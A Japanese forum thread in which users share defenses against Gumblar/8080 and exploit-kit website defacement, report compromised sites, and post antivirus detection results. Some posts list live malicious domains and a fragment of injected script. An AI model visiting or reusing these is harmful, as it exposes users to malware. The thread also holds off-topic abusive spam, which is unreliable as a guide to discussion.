TOP カテ一覧 スレ一覧 100〜終まで 2ch元 削除依頼
【アビラ】Avira Antivirus ver.18
NOD32 ESS 【28xx ok complete】
KINGSOFT Internet Security Part26
無償オンラインスキャンpart3【ウイルス撲滅】
【中国】キングソフトアンチスパイ2006+【アンチスパイ工作ウェア】
トレンドマイクロ「( ´,_ゝ`) 賠償?しねぇよ(笑)」
暗号アルゴリズムに重大な欠陥発見の報告相次ぐ
Comodo AntiVirus
Android powered by McAfee
Hotmailのパスワードの解析
【Gumblar/GENO】Web改竄ウイルス総合11【8080】
- 1 :2012/08/14 〜 最終レス :2015/12/11
- 改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
前スレ
【Gumblar/GENO】Web改竄ウイルス総合10【8080】
http://kohada.2ch.sc/test/read.cgi/sec/1279692828/
- 2 :
- Gumblar(.x)、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
- 3 :
- 【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
- 4 :
- ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
- 5 :
- ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
- 6 :
- 改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。
■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support
- 7 :
- 改竄を受けたら
ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
- 8 :
- ■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
- 9 :
- >>8
WebGetterのドメインが変更になったもよう。
rd.or.tp → rd.or.tl
- 10 :
- .
- 11 :
- そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
- 12 :
- 天麩羅以外殆どレスがついてないな。平穏で何より。
- 13 :
- さらみ復帰かきこ
- 14 :
- 「Adobe Reader」の「サンドボックス」を回避する脆弱性はなぜ危険か(トレンドマイクロ)
scan.netsecurity.ne.jp/article/2012/11/28/30520.html
>このエクスプロイトは、JavaScriptがソフトウェア上で無効になっている場合でも実行される。
>ユーザが必要とされる唯一のやりとりは、PDFファイルを開き、Webブラウザを閉じるだけで、
>それだけで脆弱性が悪用される。
- 15 :
- 「ITSOKNOPROBLEMBRO」
It's OK no problem bro.
「bro」って、なんじゃろ?
- 16 :
- JPドメイン Web改竄速報
tp://izumino.jp/Security/def_jp.html
- 17 :
- いろんなCMSがあるのね
ぱっと見、Joomla! 1.5が多いなん
「Joomla!」ってのはLTSが2.5で、まいなうpだてJoomla! 2.5.8になってるね
トップページにMETA HTTP-EQUIV="Refresh"〜仕込まれてるとこがあるる
こりは故意にやってるのかどーかわかんね
どーすべさ
- 18 :
- >< ;
> このメールにはご注意ください。送信者のアカウントが不正に使用されている可能性があるため、このメールは個人情報を騙し取ろうとする詐欺である可能性があります。
ぁぅぁぅぁー
検体8080を送ったら、ベンダーからの返信がみーんなこーなってた…
って、ことは改竄サイトのホスティングにはつーほーめる届いてないかもん
- 19 :
- [Google セーフ ブラウジング診断ページ: microad.jp]
http://www.google.com/safebrowsing/diagnostic?site=microad.jp/
microad.jp は、過去 90 日間に 21 個のサイト(www34.atwiki.jp/no1mixisagi/, www16.atwiki.jp/godeaterburst-wiki/, soccer-douga.com/ など)への感染媒体となっていた形跡があります。
- 20 :
- RedKit Redirector Injected into Legitimate JavaScript Code | Xanda's Blog !~!
http://blog.xanda.org/2013/02/15/redkit-redirector-injected-into-legitimate-javascript-code/
マルウエア被害の実例と対策について || Joomla日本語コラム
http://www.joomla.jpn.com/joomla/column/joomlacolumn/1083-vol189.html
マカフィー株式会社 | McAfee Blog - 最新のエクスプロイトキット、Red Kit
http://www.mcafee.com/japan/security/mcafee_labs/blog/content.asp?id=1351
CMS以外のサイトもパパンがパンデミック
こうしてる合間にもまかひはEXTRA.DATを生産中
ひげおじさんもあびらもまいくろそふともがむばってます
- 21 :
- RedKitリダイレクターけっこう多いよね (´ω`)
RedKit設置されてるサーバー
ぜんぶ正規のサイトだもんだからイヤラシイことこの上ない
- 22 :
- ESET参戦
> Dear ○○,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> *********_ahhd.htm_i.txt - JS/Exploit.Agent.NEN trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
>
> Regards,
>
> ESET Malware Response Team
>>21
もうね、どーしよーもにゃー
検体送付とつーほーがワンセット サンセット イーセット
(-Д-) サムイネェ
- 23 :
- >>20
> Hello,
>
> The files sent to us could be allocated to the following malware families:
>
> - EXP/Pidief.dtd
> - JS/Dldr.Agent.ahi
>
> The detections and repair routines of the malware samples will be available prospective with one of next update of the VDF.
>
> Best regards,
> Avira Sdn Bhd
うほ
- 24 :
- >>20のマカフィーが説明しているRedKitの中間Scriptが単純化したのを確認すた。。。しかも相対パスだぼ
現状、呼び出されるjar(exe)で検出されるのを待つしかにゃー
jar(exe)の進捗状況
Detection ratio: 6 / 45
Analysis date: 2013-03-14 12:13:28 UTC
↓
Detection ratio: 11 / 45
Analysis date: 2013-03-14 18:21:34 UTC
Analysis
Antivirus Result Update
DrWeb Trojan.DownLoader8.5817 20130314
Emsisoft Trojan.Win32.Agent.AMN (A) 20130314
Fortinet W32/Yakes.B!tr 20130314
Ikarus Trojan-Downloader.Win32.Karagany 20130314
Kaspersky UDS:DangerousObject.Multi.Generic 20130314
Malwarebytes Trojan.Agent.BVGen 20130314
McAfee PWS-FAQO!C7C63B63204E 20130314
Panda Suspicious file 20130314
TheHacker Posible_Worm32 20130314
TrendMicro PAK_Generic.001 20130314
TrendMicro-HouseCall TROJ_GEN.RC1H1CE 20130314
検出できないかもしれない中間Scriptとjar(exe)をメルで送れるベンダーに検体提出しました。
- 25 :
- 国内Webサーバの大規模改ざん発生中。アクセスすると別サイトから自動的にマルウェアダウンロード
http://engawa.2ch.sc/test/read.cgi/poverty/1363534745/
- 26 :
- 国内Webサーバの大規模改ざん発生age
- 27 :
- 【社会】環境省サイトが改ざんされる…閲覧者がウイルス感染する危険も
uni.2ch.sc/test/read.cgi/newsplus/1363506806/
環境省に聞いてみました
改ざんされてると分かったのはなぜ?
ゼロデイ・ジャパン(0day.jp) | セキュリティ&マルウェア研究所
0day.jp/
↑
ここで告知されていたからとのこと
- 28 :
- 924 :名無しさん@お腹いっぱい。:2013/03/18(月) 16:11:10.81
環境省サイト改ざんウイルス
https://www.virustotal.com/ja/file/a22fdaff19722f4a4d92df3f0057761cf6834a36eb54862938b77ce6ee4539bc/analysis/1363349552/
https://www.virustotal.com/ja/file/a1bf517e91726f5e5dd57640b35e7bd4fc203ad843bbc7cdc472004a8d644933/analysis/1363559122/
- 29 :
- ■NSX GT-ONE GT-ROM.NET
www●gt-rom●net/
>このサイトはコンピュータに損害を与える可能性があります。
- 30 :
- >>24
EXEのダウンロードパスが固定数値からランダム数値に切り替わってるね
xxxx.htm
yyy.jar
??.html ← EXEが入手できん! (´ω`)
>>29
改竄されてて
最終的にCridexというマルウェアの感染となーる
- 31 :
- ぅほっ
一日見ない間になんかすごいことに
>>25-28
リストが多くて挫折したのさ。。。orz....
>>29
アッー
>>30
やっぱランダムだたのね
>24以後、DLできなくなたー
決め打ちもできんくなたー
- 32 :
- 感染サイト一覧
unixfreaxjp.blogspot.jp/2013/03/ocjp-098-285blackhole-exploit-kit.html
つまり、周知キャンペーンw
- 33 :
- <愛国者とネトウヨの11の違い>
理路整然と意見を話すのが愛国者 出所不明な怪文書を貼るのがネトウヨ
有識で周りの評価が高いのが愛国者 無職でプライドだけ高いのがネトウヨ
日本人である事を誇りに思うのが愛国者 日本人である事だけが誇りなのがネトウヨ
討論で相手の愛国度をはかるのが愛国者 討論で相手を売国奴扱いするのがネトウヨ
君が代をきちんと歌えるのが愛国者 気味が悪いほどネットで吠えるのがネトウヨ
家族思いなのが愛国者 家族の重荷になっているのがネトウヨ
社会に出て一人前なのが愛国者 2ちゃんねるでだけ一人前なのがネトウヨ
日本の歴史と政治に学が深いのが愛国者 2ちゃんの書き込みとレスが不快なのがネトウヨ
日本人が逮捕されると残念だと嘆くのが愛国者 日本人が逮捕されると通名だとわめくのがネトウヨ
日本の事を敬虔(けいけん)に思っているのが愛国者 自分の事を聖戦士だと思っているのがネトウヨ
投票で清き一票を入れるのが愛国者 妄想でキモい文章を作るのがネトウヨ
- 34 :
- 私は
一庶民
カスミソウの様に
密やかに
- 35 :
- >29 VTで検出されるよーになたー
難読化されたScript
BitDefender JS:Trojan.Crypt.MF
F-Secure JS:Trojan.Crypt.MF
GData JS:Trojan.Crypt.MF
Ikarus Exploit.JS.Blacole
MicroWorld-eScan JS:Trojan.Crypt.MF
nProtect JS:Trojan.Crypt.MF
呼び先のphp
Microsoft Exploit:JS/Blacole.GB
Sophos Mal/ExpJS-N
こっからさきはRんかった
ESETとひげおぢさんからめる
ESET
JS/Kryptik.AII trojan
JS/Kryptik.AIK trojan
JS/Exploit.Agent.NEO trojan
ひげおぢさん
Trojan-Downloader.JS.DarDuk.lb
CsideNet様から受領のお返事来てました。
VTとかが反応してきたので対応されるかと思ふぽ
頻繁に更新してるようですが
ドメインがSPAM扱いされてるようになったみたいで、検体メルで送り辛い ><;
- 36 :
- あげ
- 37 :
- あびらからもきてた>35
JS/Expy.B〜F
- 38 :
- >>35
乙でし。
>Last-Modified: Tue, 19 Mar 2013 12:42:23 GMT
>Last-Modified: Tue, 19 Mar 2013 13:27:15 GMT
凄い勢いで更新?
※電話がボボンで代行依頼 orz ありがとう代行さん...
- 39 :
- >>38
お疲れ様です
4種類ぐらいのScriptが繰り返し交互に変わっているようです
happy-lemon、apmsolucionesweb、speciaalaangepast、vedelaar
んでそれぞれさらに違うとこへ誘導
ipodのとこには古い8080が(ry
- 40 :
- ぼぼん解除てすt
- 41 :
- >>24のRedKitの中間Scriptが難読化した
現状まかひのみ対応
File type: HTML
Detection ratio: 2 / 46
McAfee Exploit-Rekit.f 20130402
McAfee-GW-Edition Exploit-Rekit.f 20130402
- 42 :
- Exploit Kit が設置されてたはずのサイトへ逝ってみた
トップページには
> Hacked By CompLeXx* & XIX
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
- 43 :
- Trojan-Downloader.Win32.Karagany
新KwバルスECM:
90 34 00 00 21 00 17 02 0d ee 0c 56 5d 8a 9a 88 20 3c 69 26 e0 70 c0 dc 5c 04 15 de c8 a2 9f 0d be 5a 1b d8 e1 98 00
timeta70bledeva.rr.nu
https://www.virustotal.com/ja/url/ad520632542fa49f1a301af12c75b47925bedccc5f7964872dfbdc4b7938a52c/analysis/1364931178/
Mal/HTMLGen-A
n8vlzd5e9h.diipl.com
https://www.virustotal.com/ja/url/ed70555e53241290b281985d0988ca0f8e8f898ee5d465f817ae966d0c124752/analysis/1364931361/
Mal/HTMLGen-A
https://www.virustotal.com/ja/url/a03758a568622c159348ce323beb9085367ed71afde257162b10a40528cb7007/analysis/1364931554/
ESET Malware site
Google Safebrowsing Malware site
- 44 :
- Google セーフ ブラウジング
このサイトは危険にさらされている可能性があります
http://www.stopforumspam.com/ipcheck/
http://support.google.com/websearch/answer/190597?hl=ja
- 45 :
- BlackHole Exploit Kit Redirectorだと思うけど
ランダムにExploit Kitサイトや金融系っぽいサイトに飛ばされるので新手のフィッシングかと思ってたら
自分でも知ってるbloombergにも逝っちゃた
どうやらノーマルなサイトと混ぜて飛ばされるみたい
金融系の末尾あたりに付く「LBTG」ってなんじゃろか?
株価チャートのことかなん
- 46 :
- >>45の亜種
ひげおぢさんから自動お返事の件名「[!!Spam KSE]Re: 〜」
途中誘導されてるとこの一つのアドレスが薬物(Viagra等)販売サイトなのでこーなった…
他のベンダーに届いているのか心配
>>45との共通点
:タグの文字列
:難読Script デコードめんどいからaguse最高(´∇`) gredでも確認でけるYO
:誘導先に金融系サイトが混ざっている模様。恐らく検出逃れかと
- 47 :
- >>45
BitDefender Trojan.JS.Iframe.DDE 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
- 48 :
- >>45
別件だけど関連
http://kohada.2ch.sc/test/read.cgi/sec/1160377080/822
- 49 :
- >>47
Antivirus Result Update
BitDefender Trojan.JS.Iframe.DDE 20130415
DrWeb JS.IFrame.418 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
Ikarus Trojan.JS.IFrame 20130415
Microsoft Trojan:JS/BlacoleRef.DD 20130415
MicroWorld-eScan Trojan.JS.Iframe.DDE 20130415
nProtect Trojan.JS.Iframe.DDE 20130415
TrendMicro-HouseCall TROJ_GEN.F47V0415 20130415
これくらい検出されれば、改竄されたことに気付くかなん
- 50 :
- >>46
BitDefender Trojan.Script.CDK 20130416
Commtouch JS/IFrame.RS 20130416
DrWeb JS.IFrame.418 20130416
Emsisoft Trojan.Script.CDK (B) 20130416
F-Prot JS/IFrame.RS 20130416
F-Secure Trojan.Script.CDK 20130416
GData Trojan.Script.CDK 20130416
Microsoft Trojan:JS/BlacoleRef.CZ 20130416
MicroWorld-eScan Trojan.Script.CDK 20130416
nProtect Trojan.Script.CDK 20130416
Sophos Mal/Iframe-AO 20130416
TrendMicro-HouseCall TROJ_GEN.F47V0414 20130416
- 51 :
- >>49
Avira
JS/Iframe.CI
HTML/Iframe.CN
JS/Iframe.CL
- 52 :
- >>45
また変わった
パパンがパンデミック
DrWeb JS.IFrame.418 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
中間Script
McAfee Exploit-Rekit.f 20130416
Norman RedKit.B 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
BlackHoleもRedKitも同じ中間Scriptになったのかな? > Norman
- 53 :
- >>52増えた
BitDefender Trojan.JS.Agent.IYS 20130417
Commtouch JS/IFrame.RS.gen 20130417
DrWeb JS.IFrame.418 20130417
Emsisoft Trojan.JS.Agent.IYS (B) 20130417
F-Prot JS/IFrame.RS.gen 20130417
F-Secure Trojan.JS.Agent.IYS 20130417
GData Trojan.JS.Agent.IYS 20130417
Ikarus Trojan.JS.BlacoleRef 20130417
McAfee JS/Blacole-Redirect.aa 20130417
Microsoft Trojan:JS/BlacoleRef.DD 20130417
MicroWorld-eScan Trojan.JS.Agent.IYS 20130417
Norman Blacole.TB 20130417
nProtect Trojan.JS.Agent.IYS 20130417
TrendMicro-HouseCall TROJ_GEN.F47V0416 20130417
確認できてから三度改竄されてるけど
どんなセキュリティソフト使ってんだろ?
Fxやちょろめ、ぐぐるを使わないんだろか?
孫やほーだと警告でにゃーし
とっくの昔に直接めるしてるし
NTTPCコミュニケーションズからも通達されてるはずなんだけど。。。
ドメインがスパムとかに登録されちゃってるのかな?
Wab上での機会損失関係ない企業なぬか?
ついったーやってるっぽいんだけどにゃー
ひょっとして蜜壷?
- 54 :
- >>53
四度目
AntiVir JS/BlacoleRef.CZ.7 20130418
Commtouch JS/IFrame.RS.gen 20130418
DrWeb JS.IFrame.418 20130418
F-Prot JS/IFrame.RS.gen 20130418
Ikarus Trojan.JS.IFrame 20130418
McAfee JS/Blacole-Redirect.aa 20130418
Microsoft Trojan:JS/BlacoleRef.DD 20130418
Norman Blacole.TB 20130417
つーほーめる届いてなくても
いーかげん気付かないかなん
- 55 :
- >>54
五度目
AntiVir JS/BlacoleRef.CZ.7 20130419
BitDefender Trojan.Script.CDS 20130419
Commtouch JS/IFrame.RS.gen 20130419
DrWeb JS.IFrame.418 20130419
Emsisoft Trojan.Script.CDS (B) 20130419
F-Prot JS/IFrame.RS.gen 20130418
F-Secure Trojan.Script.CDS 20130419
GData Trojan.Script.CDS 20130419
Ikarus Trojan.JS.IFrame 20130419
McAfee JS/Blacole-Redirect.aa 20130419
McAfee-GW-Edition JS/Blacole-Redirect.aa 20130419
Microsoft Trojan:JS/BlacoleRef.DD 20130419
MicroWorld-eScan Trojan.Script.CDS 20130419
Norman Blacole.TB 20130419
nProtect Trojan.Script.CDS 20130419
もうベンダーに送る気力がにゃい
- 56 :
- こりもころころ変わるっぽい>中間Script
Sophos Troj/ExpJS-II 20130419
55ひっくるめて送った>ベンダー
- 57 :
- >>55
七度目
Detection ratio: 2 / 46
Analysis date: 2013-04-21 16:31:34 UTC
Antivirus Result Update
McAfee JS/Exploit-Blacole.ht 20130421
Norman Blacole.TH 20130421
六度目は>>47>>49とおなじものですた
- 58 :
- 中間Script >>57
久しぶりにひげおじさん登場
Detection ratio: 18 / 46
Analysis date: 2013-04-21 17:25:00 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.7 20130421
BitDefender Trojan.JS.Agent.IYT 20130421
Commtouch JS/IFrame.RS.gen 20130420
Comodo UnclassifiedMalware 20130421
DrWeb JS.IFrame.418 20130421
Emsisoft Trojan.JS.Agent.IYT (B) 20130421
F-Prot JS/IFrame.RS.gen 20130420
F-Secure Trojan.JS.Agent.IYT 20130421
Fortinet JS/Agent.GWA!tr.dldr 20130421
GData Trojan.JS.Agent.IYT 20130421
Ikarus Trojan.JS.IFrame 20130421
Kaspersky Trojan-Downloader.JS.Agent.gwa 20130421
McAfee JS/Exploit-Blacole.eu 20130421
McAfee-GW-Edition JS/Exploit-Blacole.eu 20130421
Microsoft Trojan:JS/BlacoleRef.DD 20130421
Norman Blacole.TB 20130421
nProtect Trojan.JS.Agent.IYT 20130421
TrendMicro-HouseCall TROJ_GEN.F47V0420 20130421
単純化しちゃったのがまた出た
Detection ratio: 0 / 46
Analysis date: 2013-04-21 17:15:56 UTC
ねもい
- 59 :
- ( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
スパムとかのドメインがあったもより
まかひには送れない
- 60 :
- >>57
八回目…
Detection ratio: 6 / 46
Analysis date: 2013-04-23 04:15:16 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.8 20130423
DrWeb Exploit.BlackHole.182 20130423
McAfee JS/Exploit-Blacole.ht 20130423
NANO-Antivirus Trojan.Script.IFrame.bohxwi 20130423
Norman Blacole.TH 20130422
VIPRE Trojan.JS.Obfuscator.aa (v) 20130423
- 61 :
- > Dear *****,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> Regards,
>
> ESET Malware Response Team
いつもごめんよぉー
肝心の大ボス捕まえられなくて
- 62 :
- これまで蜜壷状態だったとこが正常になった模様です。
お疲れ様でした。
定点観測おはり
- 63 :
- こんな夜中にGMOの中の人が受理してくれました>インシデント
ゴールデンなウィークですがお疲れ様です。
ありがとうございます。
この場を借りてお礼申し上げます。
- 64 :
- 一回目
AntiVir JS/BlacoleRef.CZ.12 20130503
Avast JS:Decode-ADH [Trj] 20130504
GData JS:Decode-ADH 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
二回目
AntiVir JS/BlacoleRef.CZ.12 20130504
Avast JS:Decode-ADH [Trj] 20130504
BitDefender Trojan.JS.Iframe.DDQ 20130504
Emsisoft Trojan.JS.Iframe.DDQ (B) 20130504
F-Secure Trojan.JS.Iframe.DDQ 20130504
GData Trojan.JS.Iframe.DDQ 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
MicroWorld-eScan Trojan.JS.Iframe.DDQ 20130504
nProtect Trojan.JS.Iframe.DDQ 20130504
三回目
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
Script更新して殆どのベンダー半日もたんかった
てーてんかんそくなぬか
サイトの対応は早くても明後日、火曜日以降になるんだろーな
- 65 :
- >>64
> 三回目
増えた
BitDefender Trojan.JS.Iframe.DDT 20130505
Comodo UnclassifiedMalware 20130505
Emsisoft Trojan.JS.Iframe.DDT (B) 20130505
F-Secure Trojan.JS.Iframe.DDT 20130505
GData Trojan.JS.Iframe.DDT 20130505
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130505
MicroWorld-eScan Trojan.JS.Iframe.DDT 20130505
nProtect Trojan.JS.Iframe.DDT 20130505
TrendMicro-HouseCall TROJ_GEN.F47V0504 20130505
- 66 :
- 覚音山 西徳寺
www●saitoku●net/
iframe name=Twitter scrolling=auto・・・
競馬の予想屋
keibaky●com
<!--c3284d--><script>try{1-prototype;}catch・・・
two2readblog●com
>不正なソフトウェアには 550 trojan(s) など
wwwwwwww
- 67 :
- 上二つGMO、ばりゅどめにつーほー
- 68 :
- 別件ばぅぁー
ひげおぢさん
> Hello,
>
> New malicious software was found in the attached file. Its detection will be included in the next update.
>
> All these 4 files will be detected as Trojan-Downloader.JS.Iframe.ddg
>
> Thank you for your help.
>>64-65
なおた ヽ(´ー`)ノ
- 69 :
- RedKit Exploit Kit Redirector Site 某所のJSファイル
AntiVir HTML/TwitScroll.B 20130508
Avast JS:Iframe-AML [Trj] 20130508
AVG HTML/Framer 20130508
BitDefender Trojan.Iframe.CBN 20130508
Commtouch IFrame.gen 20130508
Comodo TrojWare.JS.Iframe.FK 20130508
Emsisoft Trojan.Iframe.CBN (B) 20130508
ESET-NOD32 JS/Iframe.HH 20130508
F-Prot IFrame.gen 20130508
F-Secure Trojan.Iframe.CBN 20130508
Fortinet JS/Iframe.HH!tr 20130508
GData Trojan.Iframe.CBN 20130508
Ikarus Exploit.HTML.IframeRef 20130508
Kaspersky HEUR:Trojan.Script.Generic 20130508
McAfee JS/IFrame.gen.j 20130508
McAfee-GW-Edition JS/IFrame.gen.j 20130508
Microsoft Exploit:HTML/IframeRef.DM 20130508
MicroWorld-eScan Trojan.Iframe.CBN 20130508
NANO-Antivirus Trojan.Html.TwitScroll.bklyhq 20130508
Norman Iframe.UW 20130508
nProtect Trojan.Iframe.CBN 20130508
PCTools Trojan.Webkit 20130508
Sophos Troj/Iframe-JG 20130508
Symantec Trojan.Webkit!html 20130508
VIPRE Malware.JS.Generic (JS) 20130508
おしんさん、がむばって
- 70 :
- 改竄サイトをホスティングにつーほーしてるなまかへ
ドメインがブロックされることが多いので、めんどいけどフォームからもつーほーしてね
- 71 :
- BlackHole Exploit Kit Redirector Siteの新種のScript
